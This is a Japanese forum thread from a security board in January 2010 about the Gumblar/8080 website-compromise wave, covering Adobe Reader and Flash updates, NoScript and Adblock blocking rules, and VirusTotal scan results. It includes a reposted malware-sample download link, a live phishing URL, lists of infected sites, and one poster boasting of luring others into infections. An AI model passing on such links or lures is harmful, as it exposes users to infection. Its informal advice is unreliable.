だめだ、社内のReaderとFlash他の更新作業でマジつかれてる・・(泣
0140名無しさん@お腹いっぱい。
2010/01/10(日) 19:03:47flashのアンインストーラーで消せなかったっけ?
0141名無しさん@お腹いっぱい。
2010/01/10(日) 19:09:12Foxitにもかなり以前から放置されている脆弱性があるよ。
adobeと同じかどうかは知らないが。
0143117
2010/01/10(日) 19:14:35>flashのアンインストーラーで消せなかったっけ?
ありがとう!
削除できました!!
0144名無しさん@お腹いっぱい。
2010/01/10(日) 19:23:070145名無しさん@お腹いっぱい。
2010/01/10(日) 19:30:300146名無しさん@お腹いっぱい。
2010/01/10(日) 19:35:030147名無しさん@お腹いっぱい。
2010/01/10(日) 19:36:08正論過ぎてワロタw
0148117
2010/01/10(日) 19:52:22普通のPCには、Flashいれてるお。
なぜか、「IEのWebインタフェースのシステム=インターネット使うもの」思い込んでるのがいて、
わざわざ「(IEの)ホームページをYahooにする」とか「自分のPCを使わないでWebサイト見ようとする」のがいる。
0149名無しさん@お腹いっぱい。
2010/01/10(日) 19:55:540150名無しさん@お腹いっぱい。
2010/01/10(日) 19:58:04ここでする話じゃないから
http://pc11.2ch.net/pcqa/
こっちの適当なスレで聞けよw
0151名無しさん@お腹いっぱい。
2010/01/10(日) 19:58:14Vipperカエレ
0152名無しさん@お腹いっぱい。
2010/01/10(日) 20:04:260153117
2010/01/10(日) 20:05:010154名無しさん@お腹いっぱい。
2010/01/10(日) 20:05:11システム管理者レベルでパソはないだろ・・・
古いのはよくわからんけど6はアンインストールできないの?
0155名無しさん@お腹いっぱい。
2010/01/10(日) 20:05:52ごめんリロードしてなかった
0156名無しさん@お腹いっぱい。
2010/01/10(日) 20:07:260157名無しさん@お腹いっぱい。
2010/01/10(日) 20:11:000158117
2010/01/10(日) 20:19:54>>154
人手がたりないから何でもやります。
>>140の教えてくれたとおおり、adobeのサイトからアンインストーラ落としてきて
削除できました。
0159名無しさん@お腹いっぱい。
2010/01/10(日) 20:24:350160117
2010/01/10(日) 20:26:18だっておwwwww
0161名無しさん@お腹いっぱい。
2010/01/10(日) 20:26:220162名無しさん@お腹いっぱい。
2010/01/10(日) 20:28:020163117
2010/01/10(日) 20:29:15ありがと。
Readerだけ更新する手間(新版がでたらもう一回入れなおす)とFlashも一緒に更新する手間も大して変わらないので
一緒に更新してます。
0164名無しさん@お腹いっぱい。
2010/01/10(日) 20:29:180165名無しさん@お腹いっぱい。
2010/01/10(日) 20:33:170166117
2010/01/10(日) 20:46:26褒美に感染する権利をやろう
0167117
2010/01/10(日) 20:55:37社内にウイルス対策ソフトだけじゃダメ。Adobe ReaderとFlashの更新が必要ということが認知された。
「やばそうなソフトもいっしょに更新または削除しろ」という判断になった。
ソフト自動配布ソフト買う話ができるようになった。
0168117
2010/01/10(日) 20:57:500169名無しさん@お腹いっぱい。
2010/01/10(日) 20:58:350170名無しさん@お腹いっぱい。
2010/01/10(日) 21:05:44http://pc11.2ch.net/test/read.cgi/sec/1261855221/
ESETがJS/TrojanDownloader.Agent.NRL トロイの木馬 検出して
前スレ開くと接続が遮断されるんだけどなんですかねこれ
0171名無しさん@お腹いっぱい。
2010/01/10(日) 21:07:440172名無しさん@お腹いっぱい。
2010/01/10(日) 21:07:55不安ならオンラインスキャンも追加しとけよ。
http://lhsp.s206.xrea.com/misc/onlinescan.html
http://mangakakouze.com/?sscv6/home.asp?langid=jp
0173名無しさん@お腹いっぱい。
2010/01/10(日) 21:11:03感染サイトなので注意
0174名無しさん@お腹いっぱい。
2010/01/10(日) 21:40:000175名無しさん@お腹いっぱい。
2010/01/10(日) 21:45:31http://pc11.2ch.net/test/read.cgi/sec/1259607683/675
これわかる方おられます?
0176名無しさん@お腹いっぱい。
2010/01/10(日) 22:17:55うちのESETは何も言わないけど・・・
0177117
2010/01/10(日) 22:23:46URLを具体的に
0178名無しさん@お腹いっぱい。
2010/01/10(日) 22:59:10にplugin-changelog.pdfがbloodhound.pdf.5に感染してるとヒューリスティック検出。
言われてる更新は全部最新なんだけど、どこでもらったのかまったく記憶がない。
ダウンロードはされたけど、発動しなかったってことなんだろうか?
しかも友達にガンブラー流行ってるよって言われて、
ノートン以外でスキャンしてみようと、トレンドマイクロのオンラインスキャンをやってる最中に
ノートンのAuto-Protectが働いて上のパスから検出したというのがわからない。
一応感染してるかどうかのレジストリ等の確認では感染はしてないみたいなんだけど…。
再インストールしたほうがいいのかなぁ
0179名無しさん@お腹いっぱい。
2010/01/10(日) 23:04:27\ ヽ / /
‐、、 殺 伐 と し た ス レ に 鳥 取 県 が ! ! _,,−''
`−、、 __/\ _,,−''
`−、、 _| `〜┐ _,,−''
_ノ ∫
_,.〜’ /
───────‐ ,「~ ノ ───────‐
,/ ` ̄7
| 島 根 県 /
_,,−' ~`⌒^7 / `−、、
_,,−'' 丿 \, `−、、
,'´\ / _7 /`⌒ーへ_,._⊃ /`i
! \ _,,-┐ \ _,.,ノ r‐-、、 / !
゙、 `ー--<´ / L. ,〜’ ゙、 >−一'′ ,'
y' U `ヽ/ / ヽ ヽ '´ U イ
____
/ __ | \____\
___/__ / ̄ ____|____ \ \____\
//ヽ /___ /|\ \ \____\
/ / ヽ / /__ / | \ \_______
/ / / / / / | \ | \
/ / / / _/ __/ | \__ | \  ̄―_
0180名無しさん@お腹いっぱい。
2010/01/10(日) 23:08:32カスペ2010をアンスコしていたが
今回の騒動でまたインスコしました
ルートキットは修正されたのか
ずいぶんとキビキビ軽くなった
ホモとかメタボとか、おやじを馬鹿にしていたが
カスペがやはり一番信用できるにゃ
0181名無しさん@お腹いっぱい。
2010/01/10(日) 23:24:40トレンドマイクロのオンラインスキャンがそのファイルにアクセス→
ノートンがファイルアクセスに反応してリアルタイムスキャン→
ウイルス検出という流れかな
PDFをDLしたときの定義ファイルでは検出できなかったんだろう
ウイルス感染したかはわからん
心配ならOS入れなおしが安全安心楽ちん
0182腰抜け
2010/01/10(日) 23:34:06ttp://genochk.crz.jp/index.php
管理人殿>
<script>function・・のやつも検知できるようにして欲しいのです。
ソースは↓でググれば大量ヒットするはず
"<script>function" "return String.fromCharCode(c);" "getElementById("
なるほど、やってみます
0184名無しさん@お腹いっぱい。
2010/01/10(日) 23:43:06それ群馬県じゃないかよw
0185名無しさん@お腹いっぱい。
2010/01/10(日) 23:52:30URL具体的にって??
つまり、Noscriptを入れている環境において、Aというサイトを信用していたとして、
1.感染したサイトAを見に行く
↓
2.サイトAのJSは許可しているから、悪意のサイトBへリダイレクトされる
↓
3.サイトBは許可していないのでJSが働かない
↓
4.さらなるリダイレクトも脆弱性攻撃も発動しない
という認識が合ってるかどうかなのだけど。
1の時点で攻撃があるならアウトだけど、3かそのリダイレクト先で攻撃だよね?
間違ってる?
0186名無しさん@お腹いっぱい。
2010/01/10(日) 23:55:26/*LGPL*/
tp://www●geocities●co●jp/AnimeComic-Cell/7747/
陥落サイトの調査に戻る・・・
0187名無しさん@お腹いっぱい。
2010/01/11(月) 00:05:07多分防げる
0188名無しさん@お腹いっぱい。
2010/01/11(月) 00:05:200189名無しさん@お腹いっぱい。
2010/01/11(月) 00:05:23>>186
おつ
0190名無しさん@お腹いっぱい。
2010/01/11(月) 00:15:11「完全犯罪とは操作する側が気付かない犯罪である」だ。
今時、二回目、更新後に自分たちの存在そのものを隠そうとしないウイルスを作る馬鹿がどこにいるよ。
0191名無しさん@お腹いっぱい。
2010/01/11(月) 00:22:590192名無しさん@お腹いっぱい。
2010/01/11(月) 00:40:30ブラウザでできるだろうに
俺はトークン導入させてるけどね
その方が安全だぜ
0193名無しさん@お腹いっぱい。
2010/01/11(月) 00:44:12何それ美味しいの(´・ω・) ス
0194185
2010/01/11(月) 00:45:41ありがとう!
ということは、現状ではNoscript系で何とかなるってことですね。
問題は、手動で書き換えてるぽいから、1の段階で攻撃されたら
終わりってことか。
ゼロデイ考えると当分気を抜けませんが、少しラクになりました。
0196名無しさん@お腹いっぱい。
2010/01/11(月) 00:49:52トークンは地下鉄とかで使うんだよ、最近はカード形式になってるところが多いね
0197名無しさん@お腹いっぱい。
2010/01/11(月) 00:55:530198名無しさん@お腹いっぱい。
2010/01/11(月) 00:59:21お前ら、行くなよ!
0199名無しさん@お腹いっぱい。
2010/01/11(月) 01:01:39Good news is that ABE can prevent exploitation without hampering the useful functionality.
If you’re concerned about this issue, you just need to open NoScript Options|Advanced|ABE and edit the “USER” ruleset, adding the following rule:
# NAT Pinning blockage (blocks outbound HTTP traffic to unlikely ports)
Site ^https?://[^/]+:[0-35-7]
Deny
>Bad news is that Java, Flash, Silverlight and maybe other plugins can open raw sockets bypassing any browser control,
>including ABE. Just another reason to keep them at bay.
ttp://noscript.net/features#contentblocking
Finally, toggling
NoScript Options/Embeddings/Apply these restrictions to trusted sites too
extends the plugin content restrictions you set for untrusted sites also to whitelisted pages,
turning NoScript in a general content blocker for Java, Silverlight, Flash and other plugins functionally similar to FlashBlock.
NoScriptの中の人のブログ記事だけど許可サイトでも
NoScript Options/Embeddings/Apply these restrictions to trusted sites too
以下ににチェック入れたりしたらプラグインとかの動作とかで少しは安心できるって事なんかな?
のように難読化されたコードを調査できるようになりました
ttp://genochk.crz.jp/index.php
0201名無しさん@お腹いっぱい。
2010/01/11(月) 01:07:50更新乙
0202名無しさん@お腹いっぱい。
2010/01/11(月) 01:08:08乙ー
0203名無しさん@お腹いっぱい。
2010/01/11(月) 01:08:57近所だったら牛丼おごってやりたいわ。
0204名無しさん@お腹いっぱい。
2010/01/11(月) 01:10:36乙
Botnet疑惑の新種
File B.exe.virus received on 2010.01.10 16:06:15 (UTC)
Current status: finished
Result: 2/40 (5%)
かすぺたんとトレンドマイクロだけですた・・・
0205名無しさん@お腹いっぱい。
2010/01/11(月) 01:15:45Adblock Plusを入れて
|http://*:8080*
↑これを放り込んでおけ。
※コードが発動してもきっと大丈夫
試しに実装してみたらググる先生をウイルスと認識したので^^;
0208前スレ958
2010/01/11(月) 01:44:06Gumblar(GENO)と8080系って、似てるだけで全く別物?
なんか一緒くたにしてるからみんないろいろ勘違いしてる気がするんだけど
誰か無知な俺に教えておくれ
ついでにいつから8080で騒いでるのか教えてくれるとありがたい
0209名無しさん@お腹いっぱい。
2010/01/11(月) 01:54:28ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2113
0211名無しさん@お腹いっぱい。
2010/01/11(月) 02:17:23結論:未だに修正されていない。任意のコードを幅広く実行可能。
今のところ防止策無し。アレゲなPDFを開いた時点で死亡フラグ。
0212名無しさん@お腹いっぱい。
2010/01/11(月) 02:30:030213名無しさん@お腹いっぱい。
2010/01/11(月) 02:32:500214名無しさん@お腹いっぱい。
2010/01/11(月) 02:36:44http://docs.google.com/viewer?url=
0215名無しさん@お腹いっぱい。
2010/01/11(月) 02:40:23ttp://www.kb.cert.org/ で見る限り修正済ってことになってるけど?
他に何かあんの?
0216名無しさん@お腹いっぱい。
2010/01/11(月) 02:41:55マウスオーバー辞書も使えないし
常用には無理だなそれは
0217名無しさん@お腹いっぱい。
2010/01/11(月) 02:43:390218名無しさん@お腹いっぱい。
2010/01/11(月) 02:46:18オンラインでPDFの表示・編集が出来るらしい(Free!)
ttp://www.pdfescape.com/
>>215
CVE-2009-0836等々
0219名無しさん@お腹いっぱい。
2010/01/11(月) 02:52:00いつごろ収まる??
0220名無しさん@お腹いっぱい。
2010/01/11(月) 02:53:08改ざんがいつ収まるかってのはシラネ
どうせ新しい脆弱性が見つかればそれを悪用してくるのは確実だし
0221名無しさん@お腹いっぱい。
2010/01/11(月) 02:55:56不安なのはわかるがそんな事誰にも答えられないし答えられても合っている保証はない
0222名無しさん@お腹いっぱい。
2010/01/11(月) 02:57:45> >>215
> CVE-2009-0836等々
ttp://www.securityfocus.com/archive/1/archive/1/501623/100/0/threaded
CVE-2009-0836 は対応済みみたいだけど。
0223名無しさん@お腹いっぱい。
2010/01/11(月) 03:00:10Foxit Reader 3.1.4.1125でCVE-2009-0836の脆弱性の動作確認済み
俺の環境がおかしい・・・のか!?
0224名無しさん@お腹いっぱい。
2010/01/11(月) 03:00:46そんなこと言い出したら、FirefoxにしろIEにしろ、未修正の脆弱性があるわけだし
0225名無しさん@お腹いっぱい。
2010/01/11(月) 03:02:480226名無しさん@お腹いっぱい。
2010/01/11(月) 03:03:55Adobeじゃないから安全という過信は禁物ってことだよ
0227名無しさん@お腹いっぱい。
2010/01/11(月) 03:08:560228名無しさん@お腹いっぱい。
2010/01/11(月) 03:10:070229名無しさん@お腹いっぱい。
2010/01/11(月) 03:24:54早よせーよと
0230名無しさん@お腹いっぱい。
2010/01/11(月) 03:27:59株式会社オーシャンブリッジ([email protected])までお問い合わせください。
0231名無しさん@お腹いっぱい。
2010/01/11(月) 04:07:13対応しました
0233名無しさん@お腹いっぱい。
2010/01/11(月) 04:21:30今回の8080にまったく関係ないぞ
0234名無しさん@お腹いっぱい。
2010/01/11(月) 04:22:48乙!
0235名無しさん@お腹いっぱい。
2010/01/11(月) 04:24:42Firefox3.6にも対応よろしく
http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=570
0236(VдV) ◆yUyb3Tqn92
2010/01/11(月) 05:08:50早速あらゆるネトゲスレやその他スレでウィルス踏ませてきたぜ!!!!
わーい大量(VдV三VдV)大量わーい
0237名無しさん@お腹いっぱい。
2010/01/11(月) 05:22:490238名無しさん@お腹いっぱい。
2010/01/11(月) 05:24:100239名無しさん@お腹いっぱい。
2010/01/11(月) 09:50:20/*LGPL*/
ttp://www●kkj●or●jp/check_publication/symbiotic/index_name.html
jsの404は何だ?
0240(VдV) ◆yUyb3Tqn92
2010/01/11(月) 10:19:580241名無しさん@お腹いっぱい。
2010/01/11(月) 10:20:460242名無しさん@お腹いっぱい。
2010/01/11(月) 10:36:33> jsの404は何だ?
/jscs/base.jsなら/*LGPL*/
0243名無しさん@お腹いっぱい。
2010/01/11(月) 10:36:49wikiってwikipediaのこと?
0244名無しさん@お腹いっぱい。
2010/01/11(月) 10:50:21そのサイトのjsも/*LGPL*/だが反応なし
avast!には提出済み
ttp://www●puzzue.com/mv/
結果: 9/40 (/*LGPL*/前回)
ttp://www.virustotal.com/jp/analisis/9f98f7d38a29d95cbe39e98a2555cd7a9b6ec467308bce1a5ace14bf8e74e153-1263173057
結果: 0/41 (/*LGPL*/今回)
ttp://www.virustotal.com/jp/analisis/893496a0ad2a7a9908373edfd75855d868e971748e38588ef1ff49572fdca94d-1263173112
0245名無しさん@お腹いっぱい。
2010/01/11(月) 10:55:34更新してないHPとかまだまだ感染しててもわからないのがおおそう。
目的はなんだろ。
0246名無しさん@お腹いっぱい。
2010/01/11(月) 13:22:47tp://www●mist-mist●jp/
0247名無しさん@お腹いっぱい。
2010/01/11(月) 14:04:44index.html全滅か。。。
0248名無しさん@お腹いっぱい。
2010/01/11(月) 14:22:42cnとruを遮断すればかなり安全になるしな
↑↑↑
こういうのってどうやるんでしょうか?
自分はvista&ノートンユーザーなんですがノートン使ってやれるんでしょうか?
0249名無しさん@お腹いっぱい。
2010/01/11(月) 14:56:200250名無しさん@お腹いっぱい。
2010/01/11(月) 14:58:07やってもあんまり意味ないと思うよ。
0251名無しさん@お腹いっぱい。
2010/01/11(月) 15:03:37>>150
LRから引用
> ここは、LANや個人のPCへの侵入、トロイ、ウィルス、スパイウェアなど、
> 様々なネット上の危険や、その対策方法を語りあうための板です。
> パソコン初心者の方は、【 PC初心者板 】で、
> ネット上の架空請求などは【 防犯・詐欺対策板 】で質問した方が良い場合があります。
0252名無しさん@お腹いっぱい。
2010/01/11(月) 15:04:28防御が甘いから色々工夫してるだけで
0253名無しさん@お腹いっぱい。
2010/01/11(月) 15:08:21hxxp://blog.kyaru.net/
0254名無しさん@お腹いっぱい。
2010/01/11(月) 15:19:29カスペルスキースルー
でもフィッシングサイトとして禁止しやがったw
2010/01/11 15:17:58 禁止しました: http://google-ae.lenta.ru.insightexpressai-com.burkewebservices.ru:8080/msn.com.cn/msn.com.cn/in.com/google.com/rambler.ru/
(フィッシングサイトの定義データベースに登録されているURL) 定義データベースに登録されているURL
0255名無しさん@お腹いっぱい。
2010/01/11(月) 15:21:45blog.抜いても/*LGPL*/があるの。。。
0256腰抜け
2010/01/11(月) 15:25:04〜・〜・〜・〜・〜・〜
以下、使えそうなツール類
【System Protect】
いわゆるHIPS
ttp://www.system-protect.com/download.aspx
解説:ttp://all-freesoft.net/soft/computerprotection/systemprotect/systemprotect.html
※Ask Modeを推奨
【WinPatrol】
スタートアップへの登録、ファイルの種類の関連付けの変更などを監視
ttp://www.winpatrol.com/download.html
【Macrium Reflect FREE Edition】
バックアップ
ttp://download.cnet.com/Macrium-Reflect-Free-Edition/3000-2242_4-10845728.html解説:ttp://gigazine.net/index.php?/news/comments/20090206_macrium_reflect_free_edition/
【EASEUS Todo Backup】
バックアップ
ttp://www.todo-backup.com/download/
【仮想化】Returnil Virtual System【仮想化】
http://pc11.2ch.net/test/read.cgi/sec/1202337108/
・RVS 2.0.1.9002(旧版)>XP、Vista向け
ttp://www.filecluster.com/downloads/Returnil-Virtual-System-Personal-Edition.html
※External Mirror 1から
0257名無しさん@お腹いっぱい。
2010/01/11(月) 15:31:31Paragon Backup & Recovery 10 Free Edition
http://www.paragon-software.com/home/db-express/index.html
こんなのも最近出た
Comodo Time Machine
http://www.comodo.com/home/data-storage-encryption/data-recovery.php
0258名無しさん@お腹いっぱい。
2010/01/11(月) 15:37:330260名無しさん@お腹いっぱい。
2010/01/11(月) 15:51:36http://end.if.land.to/geno.php?url=
http://end.if.land.to/geno.php?mode=nobold&url=
0261名無しさん@お腹いっぱい。
2010/01/11(月) 15:52:570262名無しさん@お腹いっぱい。
2010/01/11(月) 16:01:25乙
簡単に使えていいね
0263名無しさん@お腹いっぱい。
2010/01/11(月) 16:03:25ソースチェッカーオンラインみたいに使えるから助かります。
>>261 そのコピペ見飽きたわw
0264名無しさん@お腹いっぱい。
2010/01/11(月) 16:12:310265名無しさん@お腹いっぱい。
2010/01/11(月) 17:28:130266名無しさん@お腹いっぱい。
2010/01/11(月) 17:30:300267名無しさん@お腹いっぱい。
2010/01/11(月) 17:42:140268名無しさん@お腹いっぱい。
2010/01/11(月) 17:46:590269名無しさん@お腹いっぱい。
2010/01/11(月) 17:50:51たとえばこんな感じ
http://www.dotup.org/uploda/www.dotup.org551126.png
0270名無しさん@お腹いっぱい。
2010/01/11(月) 17:57:01専ブラの右クリックに登録する際のコマンドを教えてもらえないでしょうか?
0271名無しさん@お腹いっぱい。
2010/01/11(月) 17:57:540272名無しさん@お腹いっぱい。
2010/01/11(月) 18:03:56UserAget欄は何のためにあるの?
http://genochk.crz.jp/index.php?url=$LINK&hids=on&code=on&chk=AUTO
>>272
UAを変えるためにあります、変えたところで特に何も変わらないことがほとんどですが
作ってしまったからしょうがない
ブラウザで利用できる検索エンジンを用意しました
ページを開くとIEではこのように検索エンジンを追加できます(Firefoxも同様)
http://rainbow2.sakuratan.com/img/rainbow2nd58546.png
0274名無しさん@お腹いっぱい。
2010/01/11(月) 18:33:31403
0275名無しさん@お腹いっぱい。
2010/01/11(月) 18:35:01ソースチェックも同様にできるとありがたいけど。
あなたのスキルなら可能ですよね。
0276名無しさん@お腹いっぱい。
2010/01/11(月) 18:36:39255は読めるぞ
0277名無しさん@お腹いっぱい。
2010/01/11(月) 18:36:550278名無しさん@お腹いっぱい。
2010/01/11(月) 18:39:400279名無しさん@お腹いっぱい。
2010/01/11(月) 18:40:34コマンド化乙です。
スクリプトだけではなく、ソースチェッカーへの対応も鑑みてはどうですか?
そのほうが需要は無限大に広がると思われます。
0280名無しさん@お腹いっぱい。
2010/01/11(月) 18:46:10更新しても変化無かったんだが、ブラウザ再起動したら403になったorz
スレ汚しすまん
0281名無しさん@お腹いっぱい。
2010/01/11(月) 18:48:40いえいえ、こちらこそ確認ありがとうございました。
ろりぽっぷが対応してくれた模様です。
0282名無しさん@お腹いっぱい。
2010/01/11(月) 19:00:25こういうのがふえてくとやる気なくすんだよな
需要が無限大とか勘弁してくれ
0283名無しさん@お腹いっぱい。
2010/01/11(月) 19:02:330284名無しさん@お腹いっぱい。
2010/01/11(月) 19:08:410285名無しさん@お腹いっぱい。
2010/01/11(月) 19:10:30あちこちで荒らしてるやつだろお前
0286名無しさん@お腹いっぱい。
2010/01/11(月) 19:11:330288名無しさん@お腹いっぱい。
2010/01/11(月) 19:17:25>>200にも問題があるよな。わざわざここで公表する必要はなかった。
0289名無しさん@お腹いっぱい。
2010/01/11(月) 19:24:210290名無しさん@お腹いっぱい。
2010/01/11(月) 19:25:33ttp://www.adobe.com/support/security/bulletins/apsb09-19.html
0291名無しさん@お腹いっぱい。
2010/01/11(月) 19:28:41Flashは今流行のやつには関係ない
このスレ的に無関係というわけではないけど
その更新先月でしょ
0292名無しさん@お腹いっぱい。
2010/01/11(月) 19:48:08ありがとう
おとといバージョンテストしてたのに見落としてたみたい
0293名無しさん@お腹いっぱい。
2010/01/11(月) 20:10:33それはべつによくね
ただ、それに便乗して自分勝手な要望出すやつが増えてくると
作ってる方が嫌になってくるってだけだ
0294名無しさん@お腹いっぱい。
2010/01/11(月) 20:16:16アホ相手するな
0295名無しさん@お腹いっぱい。
2010/01/11(月) 20:16:50かたじけない^^
0296名無しさん@お腹いっぱい。
2010/01/11(月) 20:21:32自分の欲しいものをつくって「よかったらどうぞ」でおk
0297名無しさん@お腹いっぱい。
2010/01/11(月) 20:24:040298名無しさん@お腹いっぱい。
2010/01/11(月) 20:38:02再依頼しました。
0299名無しさん@お腹いっぱい。
2010/01/11(月) 20:46:550300名無しさん@お腹いっぱい。
2010/01/11(月) 20:55:360301名無しさん@お腹いっぱい。
2010/01/11(月) 21:52:04最悪でもJavaScriptをデフォルトでオフにしておいて欲しい
0302名無しさん@お腹いっぱい。
2010/01/11(月) 21:54:010303名無しさん@お腹いっぱい。
2010/01/11(月) 21:58:270304名無しさん@お腹いっぱい。
2010/01/11(月) 22:03:360305名無しさん@お腹いっぱい。
2010/01/11(月) 22:09:34蔓延するようになったら実行しますかY/Nのダイアログ表示出すだけ
0306名無しさん@お腹いっぱい。
2010/01/11(月) 22:20:230307名無しさん@お腹いっぱい。
2010/01/11(月) 22:22:08[ はい(Y) ]
0308名無しさん@お腹いっぱい。
2010/01/11(月) 22:36:14PDF-XChange Viewerとか Foxit Reader とかいろいろあるじゃないか
0309名無しさん@お腹いっぱい。
2010/01/11(月) 22:38:470310名無しさん@お腹いっぱい。
2010/01/11(月) 22:43:310311名無しさん@お腹いっぱい。
2010/01/11(月) 22:44:28他のでも確実に安全ではないと何度言えば
0312名無しさん@お腹いっぱい。
2010/01/11(月) 22:47:19ほとんどのやつはビューワーとして使ってるだけでしょ。
俺は前回GENOがはやった時にFoxit Readerにした。
0313名無しさん@お腹いっぱい。
2010/01/11(月) 22:50:180314名無しさん@お腹いっぱい。
2010/01/11(月) 22:51:270315名無しさん@お腹いっぱい。
2010/01/11(月) 22:54:03ないないwwww
0316名無しさん@お腹いっぱい。
2010/01/11(月) 23:21:54だろうね。あと、セキュリティの穴埋めのバージョンアップと共に、要求スペックが
あがって、未だにXPとか使ってるユーザーが重くなるとかいってバージョンアップしなかったり・・・
実際、今感染してるしてるような人って、そういう感じなんじゃないのかな・
0317名無しさん@お腹いっぱい。
2010/01/11(月) 23:25:520318名無しさん@お腹いっぱい。
2010/01/11(月) 23:35:470319名無しさん@お腹いっぱい。
2010/01/11(月) 23:36:05>>83
MD5 : 35d23f69b7af292c2dcea9a1b58b6ef3
9/41
http://www.virustotal.com/jp/analisis/189416f54f929ebaeb6ae7116c5833e822b09b0bc1d4dab82e2bcc030a1450f1-1263219292
8/41
http://www.virustotal.com/jp/analisis/189416f54f929ebaeb6ae7116c5833e822b09b0bc1d4dab82e2bcc030a1450f1-1263198713
8/41
http://www.virustotal.com/jp/analisis/189416f54f929ebaeb6ae7116c5833e822b09b0bc1d4dab82e2bcc030a1450f1-1263197303
7/41
http://www.virustotal.com/jp/analisis/189416f54f929ebaeb6ae7116c5833e822b09b0bc1d4dab82e2bcc030a1450f1-1263150340
7/41
http://www.virustotal.com/jp/analisis/189416f54f929ebaeb6ae7116c5833e822b09b0bc1d4dab82e2bcc030a1450f1-1263139860
MD5 : 60cc202fb8ca7786494db1144841e407
11/41
http://www.virustotal.com/jp/analisis/ea9714abd8c3107877e397a39be3d5751a5f7a3dc74b7cb7413639fd40725a94-1263219304
7/41
http://www.virustotal.com/jp/analisis/ea9714abd8c3107877e397a39be3d5751a5f7a3dc74b7cb7413639fd40725a94-1263202459
6/41
http://www.virustotal.com/jp/analisis/ea9714abd8c3107877e397a39be3d5751a5f7a3dc74b7cb7413639fd40725a94-1263197313
2/41
http://www.virustotal.com/jp/analisis/ea9714abd8c3107877e397a39be3d5751a5f7a3dc74b7cb7413639fd40725a94-1263150347
2/41
http://www.virustotal.com/jp/analisis/ea9714abd8c3107877e397a39be3d5751a5f7a3dc74b7cb7413639fd40725a94-1263139770
0320名無しさん@お腹いっぱい。
2010/01/11(月) 23:39:56乙
0321名無しさん@お腹いっぱい。
2010/01/11(月) 23:42:09ほんの一部のユーザーは怒っています!
0322名無しさん@お腹いっぱい。
2010/01/11(月) 23:56:55なんだかんだ言っても表示品質は一番だからだろ。
0323名無しさん@お腹いっぱい。
2010/01/11(月) 23:56:55MD5 : 35d23f69b7af292c2dcea9a1b58b6ef3
3/41
http://www.virustotal.com/jp/analisis/189416f54f929ebaeb6ae7116c5833e822b09b0bc1d4dab82e2bcc030a1450f1-1263057105
MD5 : 60cc202fb8ca7786494db1144841e407
1/41
http://www.virustotal.com/jp/analisis/ea9714abd8c3107877e397a39be3d5751a5f7a3dc74b7cb7413639fd40725a94-1263110576
0324名無しさん@お腹いっぱい。
2010/01/11(月) 23:58:32illustratorかphotoshopでpdf開けばいいんじゃね
0325名無しさん@お腹いっぱい。
2010/01/11(月) 23:59:140326名無しさん@お腹いっぱい。
2010/01/12(火) 00:04:08他のファイルに変換して開けば……え、もっと使い勝手悪い?
0327名無しさん@お腹いっぱい。
2010/01/12(火) 00:07:51194 名前:名無しさん@お腹いっぱい。:2010/01/11(月) 22:01:15
ttp://www.dotup.org/uploda/www.dotup.org552022.zip.html
pass:Virus
195 名前:名無しさん@お腹いっぱい。:2010/01/11(月) 22:06:50
>>194
ttp://www.virustotal.com/analisis/60d916c851c6cc72e6de9d96b882fda284fbe37fea06ed3f502f9c96ae8abfe1-1263215078
ttp://www.virustotal.com/analisis/69b2c803e40c546b715d7f3eb647ae191b838dc13bdfbc7b8a65045135c14018-1263215072
0328名無しさん@お腹いっぱい。
2010/01/12(火) 00:15:220329名無しさん@お腹いっぱい。
2010/01/12(火) 00:17:11既出
0330名無しさん@お腹いっぱい。
2010/01/12(火) 00:17:440331名無しさん@お腹いっぱい。
2010/01/12(火) 00:48:380332名無しさん@お腹いっぱい。
2010/01/12(火) 00:51:350333名無しさん@お腹いっぱい。
2010/01/12(火) 00:52:35名簿業者みたいに、PASS等抜いて売買してるらしいって記事読んだよ。
0334名無しさん@お腹いっぱい。
2010/01/12(火) 00:53:15・Botnet構築(DDoS攻撃等に悪用される)←今回はこれ
・個人情報取得(クレジットカード番号等々)
・データ破壊
etc...
0335名無しさん@お腹いっぱい。
2010/01/12(火) 00:53:30ここに詳しく書いてある
http://www.threatexpert.com/
ttp://genochk.crz.jp/defend.html
書いてみた
0337名無しさん@お腹いっぱい。
2010/01/12(火) 01:03:08は仕事してるん
ttp://www.npa.go.jp/kokusai2/renkei.htm
ショボっ
0338名無しさん@お腹いっぱい。
2010/01/12(火) 01:04:450339名無しさん@お腹いっぱい。
2010/01/12(火) 01:06:02乙。読んでて気づいたがJAVA切っても良かったんだな。
OOo使ってるからアンインストールできなくて悩んでたんだが、ブラウザでは使う機会ほとんど無いし。
0340名無しさん@お腹いっぱい。
2010/01/12(火) 01:13:22Flash PlayerはIE用とFirefox,Chrome,Safari,Opera等用は別にアップデートする必要があるって
書いたほうがいいかも
Adobe Readerはブラウザでもプラグインを無効にしたほうがいいような気がするけどどうなんだろう?
IEならアドオンの管理、Firefoxならアドオン−プラグインで無効にして意味あるかね
0341名無しさん@お腹いっぱい。
2010/01/12(火) 01:14:17乙
追加
Google Chrome/Chromium
引数に --disable-java を追加
0342名無しさん@お腹いっぱい。
2010/01/12(火) 01:37:33gj
0343名無しさん@お腹いっぱい。
2010/01/12(火) 01:38:48わざわざやらなくていいよ
ほんと
自分が感染してたらどうなるの?
お前らm9(^Д^)プギャー 自己責任でねって言うの?
0344名無しさん@お腹いっぱい。
2010/01/12(火) 01:49:52よくやった
0345名無しさん@お腹いっぱい。
2010/01/12(火) 06:20:09クレカ情報抜かれたとは思ってる人は感染した人の中でいないだろうし
0346名無しさん@お腹いっぱい。
2010/01/12(火) 07:37:390347名無しさん@お腹いっぱい。
2010/01/12(火) 08:20:060348名無しさん@お腹いっぱい。
2010/01/12(火) 08:44:57遅レスだけど個人的にはインターネット撲滅勢力によるネット撲滅のための実力行使だと思う
0349名無しさん@お腹いっぱい。
2010/01/12(火) 09:17:11http://www.shinmai.co.jp/
クロスドメインスクリプト発見しまくられw
0350名無しさん@お腹いっぱい。
2010/01/12(火) 09:26:090351名無しさん@お腹いっぱい。
2010/01/12(火) 10:06:41これだけ感染力強いんだししばらく亜種を作り続けて
行き渡ったと思ったらゼロデイで一気にPC破壊とかな
まあそんなサイバーテロしたら自分の身が危ないわけだが
0352名無しさん@お腹いっぱい。
2010/01/12(火) 11:08:07http://news.searchina.ne.jp/disp.cgi?y=2010&d=0112&f=business_0112_012.shtml
トレンドマイクロ <4704> に注目する動きが出てきた。
09年末から10年年初にかけて、GUMBLAR(ガンブラー)によるWeb改ざん被害が増加してきたためだ。
